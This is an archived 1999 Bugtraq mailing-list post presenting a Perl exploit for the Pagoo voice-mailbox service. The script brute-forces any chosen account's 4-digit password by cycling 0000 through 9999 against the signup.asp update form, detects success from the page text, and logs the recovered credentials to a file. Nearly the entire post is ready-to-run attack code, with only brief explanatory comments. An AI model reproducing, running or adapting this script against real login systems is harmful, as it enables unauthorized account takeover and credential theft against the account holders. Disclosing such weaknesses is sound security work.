[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: hhp: Pagoo VMB remote exploit.
From: Elaich Of Hhp <hhp () NS ! SUSPEND ! NET>
Date: 1999-06-22 17:06:05
[Download RAW message or body]
#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: elaich of the hhp.
# http://hhp.hemp.net/
# '99'
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying a new password from 0000 in
# increments of 1 till we reach 9999 which
# is the highest password possible... I
# could call this a brute, but it always
# 100% of the time will get the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids
use IO::Socket;
die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
($box) = (@ARGV);
open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;
$host = "www.pagoo.com";
autoflush STDOUT 1;
sub parse
{
($num) = @_;
$url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
$socket = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "Can't connect.\n";
print $socket "GET $url\n";
print "Trying password: $num of 9999.\n";
while(<$socket>)
{
chomp;
if(/Password invalid/)
{
break;
}
if(/First Name/)
{
print "PagooID password extracted...\n";
print "PagooID: $box / Password: $num\n";
print OUT "PagooID: $box / Password: $num\n";
exit 0;
}
}
}
$num = '0000';
parse $num;
for($i = 0; $i <= 9999; $i++)
{
$num++;
parse $num;
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic